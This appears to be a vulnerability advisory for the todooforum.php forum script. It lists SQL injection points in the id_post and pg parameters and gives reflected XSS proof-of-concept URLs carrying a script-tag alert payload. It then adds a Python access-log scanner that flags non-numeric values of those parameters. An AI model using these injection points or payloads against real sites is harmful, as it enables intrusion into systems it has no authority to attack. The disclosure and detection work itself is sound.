[+] SQL Injection

[+] Parameter : id_post

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1

[+] Parameter : pg

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_here]

[+] Cross-site scripting

[+] Parameter : id_post

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1

[+] Parameter : pg

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
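
[+] Detection (added example, not part of the original advisory and not the project's code)

Both reported parameters carry numeric values in the URLs above, so a request to todooforum.php in which id_post or pg is anything other than a plain integer is worth reviewing. The script below checks web-server access-log lines for that condition; the log format, the sample lines and the assumption that both parameters are always numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCRIPT = "todooforum.php"
# Parameters the advisory lists; assumed to be numeric identifiers.
NUMERIC_PARAMS = ("id_post", "pg")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]{1,10}")  # ASCII digits only, bounded length

def suspicious_params(url):
    """Names of listed parameters whose decoded value is not a plain integer."""
    parts = urlsplit(url)
    if not parts.path.endswith("/" + SCRIPT):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    return [name for name in NUMERIC_PARAMS
            if any(not DIGITS_RE.fullmatch(v) for v in query.get(name, []))]

def scan(log_lines):
    """Return (line_number, flagged_params) for each access-log line to review."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        flagged = suspicious_params(match.group(1)) if match else []
        if flagged:
            hits.append((number, flagged))
    return hits

# Constructed sample lines (combined log format); the encoded value is the
# test string from the advisory, percent-encoded as a client would send it.
PAYLOAD = "%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x0000)%3C%2Fscript%3E"
BASE = "/todooforum/todooforum.php?cat=reponse&id_forum=0"
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET {BASE}&id_post=1&pg=1 HTTP/1.1" 200 5120',
    f'192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET {BASE}&id_post={PAYLOAD}&pg=1 HTTP/1.1" 200 5230',
    f'192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET {BASE}&id_post=2&pg={PAYLOAD} HTTP/1.1" 200 5230',
    f'192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?id_post=abc HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for number, flagged in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric {', '.join(flagged)}")
```

The same integer-only rule, enforced in the application before the values reach a query or the page output, closes both findings for these two parameters.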